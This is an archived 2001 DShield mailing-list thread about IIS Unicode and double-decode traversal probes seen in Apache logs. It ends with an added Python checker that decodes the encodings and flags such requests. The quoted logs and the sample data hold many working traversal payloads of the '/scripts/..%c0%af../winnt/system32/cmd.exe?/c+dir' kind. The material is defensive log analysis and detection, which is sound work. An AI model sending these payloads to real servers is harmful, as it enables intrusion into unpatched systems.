[Dshield] win32 exploit?

Dragos Ruiu dr at kyx.net
Sat Aug 4 01:56:56 GMT 2001


This looks like someone or something looking for vulnerable
IIS servers with the UNICODE exploit.  There are several vulnerability
scanners that would use the cmd.exe/dir combination to look for a reply
back indicating that the host is vulnerable.

You only need to worry if you are vulnerable, and you start seeing
commands other than dir/ping there.... well you need to worry if you're
vulnerable in any case. (Or if you're running IIS at all, imho :-)

cheers,
--dr

On Fri, 03 Aug 2001, Joseph Shraibman wrote:
> Does anyone know what this is?
> 
> 216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"
> 
> [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> bogus_host_without_reverse_dns 207.213.220.70 - - [06/Apr/2001:22:21:26
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 344
> bogus_host_without_reverse_dns 128.121.2.139 - - [16/Jun/2001:18:14:33
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 -
> error_log:[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70]
> File does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File
> does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> error_log:[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File
> does not exist:
> /local/www/apps253/apps/scripts/..Á?../winnt/system32/cmd.exe
> error_log:[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File
> does not exist:
> /local/www/apps253/apps/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 332 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
> HTTP/1.0" 404 328 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-"
> "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
> [Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
> [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
> exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
> 
> 
> -- 
> Joseph Shraibman
> jks at selectacast.net
> Increase signal to noise ratio.  http://www.targabot.com
> 
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see: http://www1.dshield.org/mailman/listinfo/dshield
-- 
Dragos Ruiu <dr at dursec.com>   dursec.com ltd. / kyx.net - we're from the future 
gpg/pgp key on file at wwwkeys.pgp.net or at http://dursec.com/drkey.asc
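A small checker for the kind of access-log lines quoted in this thread, as an added example (not code from the post, nor from any DShield tool). It decodes the overlong-UTF-8 (%c0%af, %c1%9c) and double-encoded (%255c) separator tricks the way a permissive IIS decoder would, flags traversal requests aimed at cmd.exe, and applies the two triage rules from the reply above: a 200 answer to such a probe, or a command other than dir/ping, is worth a look; a 404 to /c dir is just scanner noise. The sample lines are constructed to resemble the ones in the post, and the MS00-078/MS01-026 references in the comments are the Microsoft bulletins for the two decoding bugs; the function names and the "investigate"/"probe" wording are this example's own.

```python
#!/usr/bin/env python3
"""Flag IIS Unicode / double-decode traversal probes in Apache access logs.

Added example, not code from the list post.  The decoding rules are generic;
the log lines at the bottom are constructed to resemble the ones in the post.
"""
import re
from urllib.parse import unquote_plus, unquote_to_bytes

# Apache common/combined log line: client ident user [timestamp] "request" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Commands the mass scanners use for a yes/no check; anything else is hands-on.
KNOWN_RECON = {"dir", "ping"}


def fold_overlong(raw: bytes) -> bytes:
    """Collapse 2-byte overlong UTF-8 sequences (lead byte 0xC0/0xC1) to the
    single byte they encode, mimicking the permissive decoder in IIS 4/5 that
    turned %c0%af into '/' and %c1%9c into '\\' after the '..' check had already
    run (MS00-078).  Strict decoders reject these, so bytes.decode('utf-8')
    would raise instead of showing us what IIS saw.
    """
    out = bytearray()
    i = 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)


def canonicalize(path: str):
    """Return (canonical_path, tricks): the path as a permissive decoder would
    see it, plus the list of encoding tricks that were needed to get there."""
    tricks = []
    once = unquote_to_bytes(path)                 # first percent-decode pass
    if any(b in (0xC0, 0xC1) for b in once):
        tricks.append("overlong-utf8")
    folded = fold_overlong(once)
    if b"%" in folded:                            # %255c -> %5c -> '\' (MS01-026)
        tricks.append("double-decode")
        folded = unquote_to_bytes(folded)
    text = folded.decode("latin-1").replace("\\", "/")
    return re.sub(r"/+", "/", text), tricks


def analyze_line(line: str):
    """Return a finding dict for a traversal-to-cmd.exe request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("path").partition("?")
    canon, tricks = canonicalize(path)
    if "/../" not in canon or "cmd.exe" not in canon.lower():
        return None
    command = unquote_plus(query)                 # e.g. "/c dir"
    words = command.lower().split()
    verb = words[1] if len(words) > 1 and words[0] == "/c" else (words[0] if words else "")
    status = int(m.group("status"))
    if status == 200:
        verdict = "investigate: traversal probe answered with 200"
    elif verb not in KNOWN_RECON:
        verdict = f"investigate: non-recon command {verb!r}"
    else:
        verdict = "probe: rejected, scanner reconnaissance only"
    return {
        "client": m.group("client"),
        "status": status,
        "tricks": tricks,
        "canonical": canon,
        "command": command,
        "verdict": verdict,
    }


def scan(lines):
    """Run analyze_line over an iterable of log lines, keeping only findings."""
    return [f for f in map(analyze_line, lines) if f is not None]


# Constructed sample lines, modelled on the ones quoted in the post.
SAMPLE_LINES = [
    # overlong-UTF-8 probe that the server answered with 200 (as in the post)
    '216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"',
    # double-decode probe, rejected with 404
    '61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"',
    # chain of overlong separators, command passed with %20
    '207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET /scripts/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332',
    # constructed: same traversal, but a command that is not dir/ping
    '10.0.0.9 - - [04/Aug/2001:02:00:00 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+hi HTTP/1.0" 404 332',
    # ordinary request, must not be flagged
    '10.0.0.9 - - [04/Aug/2001:02:00:01 -0400] "GET /index.html HTTP/1.0" 200 1043',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"{f['client']:>15} {f['status']} {','.join(f['tricks']) or 'plain':14} {f['verdict']}")
```

The point of decoding to a canonical form rather than grepping for %c0%af is that a scanner can pick any of several byte pairs for the same separator; folding them the way the vulnerable decoder did makes the traversal visible whatever encoding was chosen. Feed it your own access_log with scan(open(path)) and look first at anything marked "investigate".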